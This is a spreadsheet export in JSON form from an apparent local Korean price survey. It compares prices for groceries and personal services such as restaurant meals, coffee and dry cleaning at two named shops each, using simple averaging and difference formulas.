[13,"콩나물","1봉지 500g ",{"$f":"COUNTIF(J19,\"<>0\")+COUNTIF(N19,\"<>0\")","v":2},{"$f":"COUNTIF(K19,\"<>0\")+COUNTIF(O19,\"<>0\")","v":2},{"$f":"IF(D19=0,0,SUM(J19,N19)/D19)","v":{"v":2157.5,"d":"2,158"}},{"$f":"IF(E19=0,0,SUM(K19,O19)/E19)","v":{"v":2157.5,"d":"2,158"}},{"$f":"G19-F19","v":0},"농협하나로마트",{"v":2625,"d":"2,625"},{"v":2625,"d":"2,625"},{"$f":"K19-J19","v":0},"트라이얼코리아",{"v":1690,"d":"1,690"},{"v":1690,"d":"1,690"},{"$f":"O19-N19","v":0}]
[14,"사과","상품 1개(300∼350g)",{"$f":"COUNTIF(J20,\"<>0\")+COUNTIF(N20,\"<>0\")","v":2},{"$f":"COUNTIF(K20,\"<>0\")+COUNTIF(O20,\"<>0\")","v":2},{"$f":"IF(D20=0,0,SUM(J20,N20)/D20)","v":{"v":2950,"d":"2,950"}},{"$f":"IF(E20=0,0,SUM(K20,O20)/E20)","v":{"v":2950,"d":"2,950"}},{"$f":"G20-F20","v":0},"농협하나로마트",{"v":2600,"d":"2,600"},{"v":2600,"d":"2,600"},{"$f":"K20-J20","v":0},"트라이얼코리아",{"v":3300,"d":"3,300"},{"v":3300,"d":"3,300"},{"$f":"O20-N20","v":0}]
[15,"배","상품 1개(650∼700g)",{"$f":"COUNTIF(J21,\"<>0\")+COUNTIF(N21,\"<>0\")","v":2},{"$f":"COUNTIF(K21,\"<>0\")+COUNTIF(O21,\"<>0\")","v":2},{"$f":"IF(D21=0,0,SUM(J21,N21)/D21)","v":{"v":3650,"d":"3,650"}},{"$f":"IF(E21=0,0,SUM(K21,O21)/E21)","v":{"v":3650,"d":"3,650"}},{"$f":"G21-F21","v":0},"농협하나로마트",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},{"$f":"K21-J21","v":0},"트라이얼코리아",{"v":3300,"d":"3,300"},{"v":3300,"d":"3,300"},{"$f":"O21-N21","v":0}]
[16,"바나나","상품 1kg",{"$f":"COUNTIF(J22,\"<>0\")+COUNTIF(N22,\"<>0\")","v":2},{"$f":"COUNTIF(K22,\"<>0\")+COUNTIF(O22,\"<>0\")","v":2},{"$f":"IF(D22=0,0,SUM(J22,N22)/D22)","v":{"v":3201.5,"d":"3,202"}},{"$f":"IF(E22=0,0,SUM(K22,O22)/E22)","v":{"v":3027.5,"d":"3,028"}},{"$f":"G22-F22","v":-174},"농협하나로마트",{"v":3500,"d":"3,500"},{"v":3152,"d":"3,152"},{"$f":"K22-J22","v":-348},"트라이얼코리아",{"v":2903,"d":"2,903"},{"v":2903,"d":"2,903"},{"$f":"O22-N22","v":0}]
[17,"쇠고기\n(한우)","등심 600g(상등육)",{"$f":"COUNTIF(J23,\"<>0\")+COUNTIF(N23,\"<>0\")","v":2},{"$f":"COUNTIF(K23,\"<>0\")+COUNTIF(O23,\"<>0\")","v":2},{"$f":"IF(D23=0,0,SUM(J23,N23)/D23)","v":{"v":72000,"d":"72,000"}},{"$f":"IF(E23=0,0,SUM(K23,O23)/E23)","v":{"v":72000,"d":"72,000"}},{"$f":"G23-F23","v":0},"농협하나로마트",{"v":75000,"d":"75,000"},{"v":75000,"d":"75,000"},{"$f":"K23-J23","v":0},"트라이얼코리아",{"v":69000,"d":"69,000"},{"v":69000,"d":"69,000"},{"$f":"O23-N23","v":0}]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",{"$f":"COUNTIF(J24,\"<>0\")+COUNTIF(N24,\"<>0\")","v":0},{"$f":"COUNTIF(K24,\"<>0\")+COUNTIF(O24,\"<>0\")","v":0},{"$f":"IF(D24=0,0,SUM(J24,N24)/D24)","v":0},{"$f":"IF(E24=0,0,SUM(K24,O24)/E24)","v":0},{"$f":"G24-F24","v":0},"농협하나로마트",0,0,{"$f":"K24-J24","v":0},"트라이얼코리아",0,0,{"$f":"O24-N24","v":0}]
[19,"돼지고기","삼겹살 600g(상등육)",{"$f":"COUNTIF(J25,\"<>0\")+COUNTIF(N25,\"<>0\")","v":2},{"$f":"COUNTIF(K25,\"<>0\")+COUNTIF(O25,\"<>0\")","v":2},{"$f":"IF(D25=0,0,SUM(J25,N25)/D25)","v":{"v":15300,"d":"15,300"}},{"$f":"IF(E25=0,0,SUM(K25,O25)/E25)","v":{"v":15300,"d":"15,300"}},{"$f":"G25-F25","v":0},"농협하나로마트",{"v":14700,"d":"14,700"},{"v":14700,"d":"14,700"},{"$f":"K25-J25","v":0},"트라이얼코리아",{"v":15900,"d":"15,900"},{"v":15900,"d":"15,900"},{"$f":"O25-N25","v":0}]
[20,"닭고기","육계 1마리(1kg 정도)",{"$f":"COUNTIF(J26,\"<>0\")+COUNTIF(N26,\"<>0\")","v":2},{"$f":"COUNTIF(K26,\"<>0\")+COUNTIF(O26,\"<>0\")","v":2},{"$f":"IF(D26=0,0,SUM(J26,N26)/D26)","v":{"v":8900,"d":"8,900"}},{"$f":"IF(E26=0,0,SUM(K26,O26)/E26)","v":{"v":8900,"d":"8,900"}},{"$f":"G26-F26","v":0},"농협하나로마트",{"v":8500,"d":"8,500"},{"v":8500,"d":"8,500"},{"$f":"K26-J26","v":0},"트라이얼코리아",{"v":9300,"d":"9,300"},{"v":9300,"d":"9,300"},{"$f":"O26-N26","v":0}]
[21,"달걀","특란 30개 한판",{"$f":"COUNTIF(J27,\"<>0\")+COUNTIF(N27,\"<>0\")","v":2},{"$f":"COUNTIF(K27,\"<>0\")+COUNTIF(O27,\"<>0\")","v":2},{"$f":"IF(D27=0,0,SUM(J27,N27)/D27)","v":{"v":6610,"d":"6,610"}},{"$f":"IF(E27=0,0,SUM(K27,O27)/E27)","v":{"v":6810,"d":"6,810"}},{"$f":"G27-F27","v":200},"농협하나로마트",{"v":7230,"d":"7,230"},{"v":7230,"d":"7,230"},{"$f":"K27-J27","v":0},"트라이얼코리아",{"v":5990,"d":"5,990"},{"v":6390,"d":"6,390"},{"$f":"O27-N27","v":400}]
[22,"조기","15cm 1마리",{"$f":"COUNTIF(J28,\"<>0\")+COUNTIF(N28,\"<>0\")","v":1},{"$f":"COUNTIF(K28,\"<>0\")+COUNTIF(O28,\"<>0\")","v":1},{"$f":"IF(D28=0,0,SUM(J28,N28)/D28)","v":{"v":1633,"d":"1,633"}},{"$f":"IF(E28=0,0,SUM(K28,O28)/E28)","v":{"v":1633,"d":"1,633"}},{"$f":"G28-F28","v":0},"농협하나로마트",{"v":1633,"d":"1,633"},{"v":1633,"d":"1,633"},{"$f":"K28-J28","v":0},"트라이얼코리아",0,0,{"$f":"O28-N28","v":0}]
[23,"갈치","60cm 1마리",{"$f":"COUNTIF(J29,\"<>0\")+COUNTIF(N29,\"<>0\")","v":2},{"$f":"COUNTIF(K29,\"<>0\")+COUNTIF(O29,\"<>0\")","v":2},{"$f":"IF(D29=0,0,SUM(J29,N29)/D29)","v":{"v":10150,"d":"10,150"}},{"$f":"IF(E29=0,0,SUM(K29,O29)/E29)","v":{"v":9400,"d":"9,400"}},{"$f":"G29-F29","v":-750},"농협하나로마트",{"v":9400,"d":"9,400"},{"v":7900,"d":"7,900"},{"$f":"K29-J29","v":{"v":-1500,"d":"-1,500"}},"트라이얼코리아",{"v":10900,"d":"10,900"},{"v":10900,"d":"10,900"},{"$f":"O29-N29","v":0}]
[24,"명태","40cm 1마리",{"$f":"COUNTIF(J30,\"<>0\")+COUNTIF(N30,\"<>0\")","v":1},{"$f":"COUNTIF(K30,\"<>0\")+COUNTIF(O30,\"<>0\")","v":1},{"$f":"IF(D30=0,0,SUM(J30,N30)/D30)","v":{"v":3800,"d":"3,800"}},{"$f":"IF(E30=0,0,SUM(K30,O30)/E30)","v":{"v":3800,"d":"3,800"}},{"$f":"G30-F30","v":0},"농협하나로마트",{"v":3800,"d":"3,800"},{"v":3800,"d":"3,800"},{"$f":"K30-J30","v":0},"트라이얼코리아",0,0,{"$f":"O30-N30","v":0}]
[25,"고등어","30cm 1마리",{"$f":"COUNTIF(J31,\"<>0\")+COUNTIF(N31,\"<>0\")","v":1},{"$f":"COUNTIF(K31,\"<>0\")+COUNTIF(O31,\"<>0\")","v":1},{"$f":"IF(D31=0,0,SUM(J31,N31)/D31)","v":{"v":4800,"d":"4,800"}},{"$f":"IF(E31=0,0,SUM(K31,O31)/E31)","v":{"v":4800,"d":"4,800"}},{"$f":"G31-F31","v":0},"농협하나로마트",{"v":4800,"d":"4,800"},{"v":4800,"d":"4,800"},{"$f":"K31-J31","v":0},"트라이얼코리아",0,0,{"$f":"O31-N31","v":0}]
[26,"냉동오징어","30cm 1마리",{"$f":"COUNTIF(J32,\"<>0\")+COUNTIF(N32,\"<>0\")","v":2},{"$f":"COUNTIF(K32,\"<>0\")+COUNTIF(O32,\"<>0\")","v":2},{"$f":"IF(D32=0,0,SUM(J32,N32)/D32)","v":{"v":4750,"d":"4,750"}},{"$f":"IF(E32=0,0,SUM(K32,O32)/E32)","v":{"v":5000,"d":"5,000"}},{"$f":"G32-F32","v":250},"농협하나로마트",{"v":4500,"d":"4,500"},{"v":5000,"d":"5,000"},{"$f":"K32-J32","v":500},"트라이얼코리아",{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},{"$f":"O32-N32","v":0}]
[27,"콩","상품 1kg",{"$f":"COUNTIF(J33,\"<>0\")+COUNTIF(N33,\"<>0\")","v":1},{"$f":"COUNTIF(K33,\"<>0\")+COUNTIF(O33,\"<>0\")","v":1},{"$f":"IF(D33=0,0,SUM(J33,N33)/D33)","v":{"v":10000,"d":"10,000"}},{"$f":"IF(E33=0,0,SUM(K33,O33)/E33)","v":{"v":10000,"d":"10,000"}},{"$f":"G33-F33","v":0},"농협하나로마트",10000,10000,{"$f":"K33-J33","v":0},"트라이얼코리아",0,0,{"$f":"O33-N33","v":0}]
[28,"고춧가루","상품 3kg",{"$f":"COUNTIF(J34,\"<>0\")+COUNTIF(N34,\"<>0\")","v":2},{"$f":"COUNTIF(K34,\"<>0\")+COUNTIF(O34,\"<>0\")","v":2},{"$f":"IF(D34=0,0,SUM(J34,N34)/D34)","v":{"v":93900,"d":"93,900"}},{"$f":"IF(E34=0,0,SUM(K34,O34)/E34)","v":{"v":93900,"d":"93,900"}},{"$f":"G34-F34","v":0},"농협하나로마트",113100,113100,{"$f":"K34-J34","v":0},"트라이얼코리아",74700,74700,{"$f":"O34-N34","v":0}]
["개인서비스 요금(49개 품목)",{"$nulls":4},0]
[1,"설렁탕","1인분 (보통)",{"$f":"COUNTIF(J36,\"<>0\")+COUNTIF(N36,\"<>0\")","v":2},{"$f":"COUNTIF(K36,\"<>0\")+COUNTIF(O36,\"<>0\")","v":2},{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":{"v":9500,"d":"9,500"}},{"$f":"IF(E36=0,0,SUM(K36,O36)/E36)","v":{"v":9500,"d":"9,500"}},0,"함흥냉면",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"K36-J36","v":0},"투가리국밥",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},{"$f":"O36-N36","v":0}]
[2,"냉면","물냉면, 1인분(보통)",{"$f":"COUNTIF(J37,\"<>0\")+COUNTIF(N37,\"<>0\")","v":2},{"$f":"COUNTIF(K37,\"<>0\")+COUNTIF(O37,\"<>0\")","v":2},{"$f":"IF(D37=0,0,SUM(J37,N37)/D37)","v":{"v":9500,"d":"9,500"}},{"$f":"IF(E37=0,0,SUM(K37,O37)/E37)","v":{"v":9500,"d":"9,500"}},0,"함흥냉면",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},{"$f":"K37-J37","v":0},"호호냉면",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"O37-N37","v":0}]
[3,"비빔밥","1인분(보통)",{"$f":"COUNTIF(J38,\"<>0\")+COUNTIF(N38,\"<>0\")","v":2},{"$f":"COUNTIF(K38,\"<>0\")+COUNTIF(O38,\"<>0\")","v":2},{"$f":"IF(D38=0,0,SUM(J38,N38)/D38)","v":{"v":8000,"d":"8,000"}},{"$f":"IF(E38=0,0,SUM(K38,O38)/E38)","v":{"v":8000,"d":"8,000"}},0,"남일보리밥",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},{"$f":"K38-J38","v":0},"이파리",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},{"$f":"O38-N38","v":0}]
[4,"갈비탕","1인분(보통)",{"$f":"COUNTIF(J39,\"<>0\")+COUNTIF(N39,\"<>0\")","v":2},{"$f":"COUNTIF(K39,\"<>0\")+COUNTIF(O39,\"<>0\")","v":2},{"$f":"IF(D39=0,0,SUM(J39,N39)/D39)","v":{"v":13500,"d":"13,500"}},{"$f":"IF(E39=0,0,SUM(K39,O39)/E39)","v":{"v":13500,"d":"13,500"}},0,"호호냉면",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},{"$f":"K39-J39","v":0},"투가리국밥",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},{"$f":"O39-N39","v":0}]
[5,"삼계탕","1인분(보통)",{"$f":"COUNTIF(J40,\"<>0\")+COUNTIF(N40,\"<>0\")","v":2},{"$f":"COUNTIF(K40,\"<>0\")+COUNTIF(O40,\"<>0\")","v":2},{"$f":"IF(D40=0,0,SUM(J40,N40)/D40)","v":{"v":13500,"d":"13,500"}},{"$f":"IF(E40=0,0,SUM(K40,O40)/E40)","v":{"v":13500,"d":"13,500"}},{"$f":"G40-F40","v":0},"고려삼계탕",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},{"$f":"K40-J40","v":0},"마로정",{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},{"$f":"O40-N40","v":0}]
[6,"된장찌개\n백반","1인분(보통)",{"$f":"COUNTIF(J41,\"<>0\")+COUNTIF(N41,\"<>0\")","v":2},{"$f":"COUNTIF(K41,\"<>0\")+COUNTIF(O41,\"<>0\")","v":2},{"$f":"IF(D41=0,0,SUM(J41,N41)/D41)","v":{"v":7750,"d":"7,750"}},{"$f":"IF(E41=0,0,SUM(K41,O41)/E41)","v":{"v":7750,"d":"7,750"}},{"$f":"G41-F41","v":0},"낙지뻘식당",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"K41-J41","v":0},"이파리",{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},{"$f":"O41-N41","v":0}]
[7,"김치찌개\n백반","1인분(보통)",{"$f":"COUNTIF(J42,\"<>0\")+COUNTIF(N42,\"<>0\")","v":2},{"$f":"COUNTIF(K42,\"<>0\")+COUNTIF(O42,\"<>0\")","v":2},{"$f":"IF(D42=0,0,SUM(J42,N42)/D42)","v":{"v":7750,"d":"7,750"}},{"$f":"IF(E42=0,0,SUM(K42,O42)/E42)","v":{"v":7750,"d":"7,750"}},{"$f":"G42-F42","v":0},"낙지뻘식당",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"K42-J42","v":0},"이파리",{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},{"$f":"O42-N42","v":0}]
[8,"불고기","1인분(200g)\n공기밥 제외",{"$f":"COUNTIF(J43,\"<>0\")+COUNTIF(N43,\"<>0\")","v":2},{"$f":"COUNTIF(K43,\"<>0\")+COUNTIF(O43,\"<>0\")","v":2},{"$f":"IF(D43=0,0,SUM(J43,N43)/D43)","v":{"v":29221.5,"d":"29,222"}},{"$f":"IF(E43=0,0,SUM(K43,O43)/E43)","v":{"v":29221.5,"d":"29,222"}},{"$f":"G43-F43","v":0},"시내식당",{"v":27777,"d":"27,777"},{"v":27777,"d":"27,777"},{"$f":"K43-J43","v":0},"광양숯불고기",{"v":30666,"d":"30,666"},{"v":30666,"d":"30,666"},{"$f":"O43-N43","v":0}]
[9,"등심구이","1인분(200g)\n공기밥 제외",{"$f":"COUNTIF(J44,\"<>0\")+COUNTIF(N44,\"<>0\")","v":2},{"$f":"COUNTIF(K44,\"<>0\")+COUNTIF(O44,\"<>0\")","v":2},{"$f":"IF(D44=0,0,SUM(J44,N44)/D44)","v":{"v":41999.5,"d":"42,000"}},{"$f":"IF(E44=0,0,SUM(K44,O44)/E44)","v":{"v":41999.5,"d":"42,000"}},{"$f":"G44-F44","v":0},"화담정",{"v":33333,"d":"33,333"},{"v":33333,"d":"33,333"},{"$f":"K44-J44","v":0},"순한우촌",{"v":50666,"d":"50,666"},{"v":50666,"d":"50,666"},{"$f":"O44-N44","v":0}]
[10,"생선초밥","1인분(보통), 활어기준",{"$f":"COUNTIF(J45,\"<>0\")+COUNTIF(N45,\"<>0\")","v":1},{"$f":"COUNTIF(K45,\"<>0\")+COUNTIF(O45,\"<>0\")","v":1},{"$f":"IF(D45=0,0,SUM(J45,N45)/D45)","v":{"v":13000,"d":"13,000"}},{"$f":"IF(E45=0,0,SUM(K45,O45)/E45)","v":{"v":13000,"d":"13,000"}},{"$f":"G45-F45","v":0},"초밥이야기",{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},{"$f":"K45-J45","v":0},null,0,0,{"$f":"O45-N45","v":0}]
[11,"튀김닭","양념통닭 1마리",{"$f":"COUNTIF(J46,\"<>0\")+COUNTIF(N46,\"<>0\")","v":2},{"$f":"COUNTIF(K46,\"<>0\")+COUNTIF(O46,\"<>0\")","v":2},{"$f":"IF(D46=0,0,SUM(J46,N46)/D46)","v":{"v":18500,"d":"18,500"}},{"$f":"IF(E46=0,0,SUM(K46,O46)/E46)","v":{"v":18500,"d":"18,500"}},{"$f":"G46-F46","v":0},"처가집치킨",{"v":19000,"d":"19,000"},{"v":19000,"d":"19,000"},{"$f":"K46-J46","v":0},"굽네치킨",{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},{"$f":"O46-N46","v":0}]
[12,"칼국수","1인분(보통)",{"$f":"COUNTIF(J47,\"<>0\")+COUNTIF(N47,\"<>0\")","v":2},{"$f":"COUNTIF(K47,\"<>0\")+COUNTIF(O47,\"<>0\")","v":2},{"$f":"IF(D47=0,0,SUM(J47,N47)/D47)","v":{"v":7500,"d":"7,500"}},{"$f":"IF(E47=0,0,SUM(K47,O47)/E47)","v":{"v":7500,"d":"7,500"}},{"$f":"G47-F47","v":0},"만나칼국수",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},{"$f":"K47-J47","v":0},"화영칼국수",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},{"$f":"O47-N47","v":0}]
[13,"조리라면","분식점 1인분",{"$f":"COUNTIF(J48,\"<>0\")+COUNTIF(N48,\"<>0\")","v":2},{"$f":"COUNTIF(K48,\"<>0\")+COUNTIF(O48,\"<>0\")","v":2},{"$f":"IF(D48=0,0,SUM(J48,N48)/D48)","v":{"v":3750,"d":"3,750"}},{"$f":"IF(E48=0,0,SUM(K48,O48)/E48)","v":{"v":3750,"d":"3,750"}},{"$f":"G48-F48","v":0},"정가네김밥",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},{"$f":"K48-J48","v":0},"이파리",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},{"$f":"O48-N48","v":0}]
[14,"김밥","분식점 1인분",{"$f":"COUNTIF(J49,\"<>0\")+COUNTIF(N49,\"<>0\")","v":2},{"$f":"COUNTIF(K49,\"<>0\")+COUNTIF(O49,\"<>0\")","v":2},{"$f":"IF(D49=0,0,SUM(J49,N49)/D49)","v":{"v":2650,"d":"2,650"}},{"$f":"IF(E49=0,0,SUM(K49,O49)/E49)","v":{"v":2650,"d":"2,650"}},{"$f":"G49-F49","v":0},"정가네김밥",{"v":2800,"d":"2,800"},{"v":2800,"d":"2,800"},{"$f":"K49-J49","v":0},"이파리",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},{"$f":"O49-N49","v":0}]
[15,"짜장면","1인분(보통)",{"$f":"COUNTIF(J50,\"<>0\")+COUNTIF(N50,\"<>0\")","v":2},{"$f":"COUNTIF(K50,\"<>0\")+COUNTIF(O50,\"<>0\")","v":2},{"$f":"IF(D50=0,0,SUM(J50,N50)/D50)","v":{"v":6000,"d":"6,000"}},{"$f":"IF(E50=0,0,SUM(K50,O50)/E50)","v":{"v":6000,"d":"6,000"}},{"$f":"G50-F50","v":0},"연경",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},{"$f":"K50-J50","v":0},"청해루",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},{"$f":"O50-N50","v":0}]
[16,"짬뽕","1인분(보통)",{"$f":"COUNTIF(J51,\"<>0\")+COUNTIF(N51,\"<>0\")","v":2},{"$f":"COUNTIF(K51,\"<>0\")+COUNTIF(O51,\"<>0\")","v":2},{"$f":"IF(D51=0,0,SUM(J51,N51)/D51)","v":{"v":8000,"d":"8,000"}},{"$f":"IF(E51=0,0,SUM(K51,O51)/E51)","v":{"v":8000,"d":"8,000"}},{"$f":"G51-F51","v":0},"연경",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},{"$f":"K51-J51","v":0},"청해루",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},{"$f":"O51-N51","v":0}]
[17,"탕수육","일반탕수육(보통)",{"$f":"COUNTIF(J52,\"<>0\")+COUNTIF(N52,\"<>0\")","v":2},{"$f":"COUNTIF(K52,\"<>0\")+COUNTIF(O52,\"<>0\")","v":2},{"$f":"IF(D52=0,0,SUM(J52,N52)/D52)","v":{"v":21000,"d":"21,000"}},{"$f":"IF(E52=0,0,SUM(K52,O52)/E52)","v":{"v":21000,"d":"21,000"}},{"$f":"G52-F52","v":0},"연경",{"v":22000,"d":"22,000"},{"v":22000,"d":"22,000"},{"$f":"K52-J52","v":0},"청해루",{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},{"$f":"O52-N52","v":0}]
[18,"돈가스","일반돈가스,1인분",{"$f":"COUNTIF(J53,\"<>0\")+COUNTIF(N53,\"<>0\")","v":2},{"$f":"COUNTIF(K53,\"<>0\")+COUNTIF(O53,\"<>0\")","v":2},{"$f":"IF(D53=0,0,SUM(J53,N53)/D53)","v":{"v":9000,"d":"9,000"}},{"$f":"IF(E53=0,0,SUM(K53,O53)/E53)","v":{"v":9000,"d":"9,000"}},{"$f":"G53-F53","v":0},"행복돈가스",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"K53-J53","v":0},"마로정",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"O53-N53","v":0}]
[19,"햄버거","기본형(야채,고기)",{"$f":"COUNTIF(J54,\"<>0\")+COUNTIF(N54,\"<>0\")","v":2},{"$f":"COUNTIF(K54,\"<>0\")+COUNTIF(O54,\"<>0\")","v":2},{"$f":"IF(D54=0,0,SUM(J54,N54)/D54)","v":{"v":2950,"d":"2,950"}},{"$f":"IF(E54=0,0,SUM(K54,O54)/E54)","v":{"v":2950,"d":"2,950"}},{"$f":"G54-F54","v":0},"뚜레쥬르",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},{"$f":"K54-J54","v":0},"트라이얼코리아",{"v":2900,"d":"2,900"},{"v":2900,"d":"2,900"},{"$f":"O54-N54","v":0}]
[20,"피자","기본형(야채,고기)",{"$f":"COUNTIF(J55,\"<>0\")+COUNTIF(N55,\"<>0\")","v":2},{"$f":"COUNTIF(K55,\"<>0\")+COUNTIF(O55,\"<>0\")","v":2},{"$f":"IF(D55=0,0,SUM(J55,N55)/D55)","v":{"v":18400,"d":"18,400"}},{"$f":"IF(E55=0,0,SUM(K55,O55)/E55)","v":{"v":18400,"d":"18,400"}},{"$f":"G55-F55","v":0},"청년피자",{"v":18900,"d":"18,900"},{"v":18900,"d":"18,900"},{"$f":"K55-J55","v":0},"피자가 기가막혀",{"v":17900,"d":"17,900"},{"v":17900,"d":"17,900"},{"$f":"O55-N55","v":0}]
[21,"커피(외식)","일반원두커피",{"$f":"COUNTIF(J56,\"<>0\")+COUNTIF(N56,\"<>0\")","v":2},{"$f":"COUNTIF(K56,\"<>0\")+COUNTIF(O56,\"<>0\")","v":2},{"$f":"IF(D56=0,0,SUM(J56,N56)/D56)","v":{"v":3000,"d":"3,000"}},{"$f":"IF(E56=0,0,SUM(K56,O56)/E56)","v":{"v":3000,"d":"3,000"}},{"$f":"G56-F56","v":0},"토프레소(창덕)",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},{"$f":"K56-J56","v":0},"요거프레소",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},{"$f":"O56-N56","v":0}]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",{"$f":"COUNTIF(J57,\"<>0\")+COUNTIF(N57,\"<>0\")","v":2},{"$f":"COUNTIF(K57,\"<>0\")+COUNTIF(O57,\"<>0\")","v":2},{"$f":"IF(D57=0,0,SUM(J57,N57)/D57)","v":{"v":3900,"d":"3,900"}},{"$f":"IF(E57=0,0,SUM(K57,O57)/E57)","v":{"v":3900,"d":"3,900"}},{"$f":"G57-F57","v":0},"토프레소(창덕)",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},{"$f":"K57-J57","v":0},"요거프레소",{"v":3800,"d":"3,800"},{"v":3800,"d":"3,800"},{"$f":"O57-N57","v":0}]
[23,"삼겹살","식육식당 200g(국내산)",{"$f":"COUNTIF(J58,\"<>0\")+COUNTIF(N58,\"<>0\")","v":2},{"$f":"COUNTIF(K58,\"<>0\")+COUNTIF(O58,\"<>0\")","v":2},{"$f":"IF(D58=0,0,SUM(J58,N58)/D58)","v":{"v":15250,"d":"15,250"}},{"$f":"IF(E58=0,0,SUM(K58,O58)/E58)","v":{"v":15250,"d":"15,250"}},{"$f":"G58-F58","v":0},"헌라산식당",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},{"$f":"K58-J58","v":0},"수림정",{"v":15500,"d":"15,500"},{"v":15500,"d":"15,500"},{"$f":"O58-N58","v":0}]
[24,"돼지갈비","식육식당 200g(국내산)",{"$f":"COUNTIF(J59,\"<>0\")+COUNTIF(N59,\"<>0\")","v":2},{"$f":"COUNTIF(K59,\"<>0\")+COUNTIF(O59,\"<>0\")","v":2},{"$f":"IF(D59=0,0,SUM(J59,N59)/D59)","v":{"v":14500,"d":"14,500"}},{"$f":"IF(E59=0,0,SUM(K59,O59)/E59)","v":{"v":14500,"d":"14,500"}},{"$f":"G59-F59","v":0},"한라산식당",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},{"$f":"K59-J59","v":0},"수림정",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},{"$f":"O59-N59","v":0}]
[25,"쇠갈비","식육식당 200g(국내산)",{"$f":"COUNTIF(J60,\"<>0\")+COUNTIF(N60,\"<>0\")","v":0},{"$f":"COUNTIF(K60,\"<>0\")+COUNTIF(O60,\"<>0\")","v":0},{"$f":"IF(D60=0,0,SUM(J60,N60)/D60)","v":0},{"$f":"IF(E60=0,0,SUM(K60,O60)/E60)","v":0},{"$f":"G60-F60","v":0},"매실한우",0,0,{"$f":"K60-J60","v":0},"삼대불고기",0,0,{"$f":"O60-N60","v":0}]
[26,"생맥주","500CC 1잔",{"$f":"COUNTIF(J61,\"<>0\")+COUNTIF(N61,\"<>0\")","v":2},{"$f":"COUNTIF(K61,\"<>0\")+COUNTIF(O61,\"<>0\")","v":2},{"$f":"IF(D61=0,0,SUM(J61,N61)/D61)","v":{"v":4000,"d":"4,000"}},{"$f":"IF(E61=0,0,SUM(K61,O61)/E61)","v":{"v":4000,"d":"4,000"}},{"$f":"G61-F61","v":0},"투모아",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},{"$f":"K61-J61","v":0},"꼬치이야기",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},{"$f":"O61-N61","v":0}]
[27,"공동\n주택관리비","주공 17평1개월\n(공과금 제외)",{"$f":"COUNTIF(J62,\"<>0\")+COUNTIF(N62,\"<>0\")","v":1},{"$f":"COUNTIF(K62,\"<>0\")+COUNTIF(O62,\"<>0\")","v":1},{"$f":"IF(D62=0,0,SUM(J62,N62)/D62)","v":{"v":52000,"d":"52,000"}},{"$f":"IF(E62=0,0,SUM(K62,O62)/E62)","v":{"v":52000,"d":"52,000"}},{"$f":"G62-F62","v":0},"목성아파트",{"v":52000,"d":"52,000"},{"v":52000,"d":"52,000"},{"$f":"K62-J62","v":0},null,0,0,{"$f":"O62-N62","v":0}]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",{"$f":"COUNTIF(J63,\"<>0\")+COUNTIF(N63,\"<>0\")","v":2},{"$f":"COUNTIF(K63,\"<>0\")+COUNTIF(O63,\"<>0\")","v":2},{"$f":"IF(D63=0,0,SUM(J63,N63)/D63)","v":{"v":8000,"d":"8,000"}},{"$f":"IF(E63=0,0,SUM(K63,O63)/E63)","v":{"v":8000,"d":"8,000"}},{"$f":"G63-F63","v":0},"서울세탁소",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"K63-J63","v":0},"때빼때세탁소",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},{"$f":"O63-N63","v":0}]
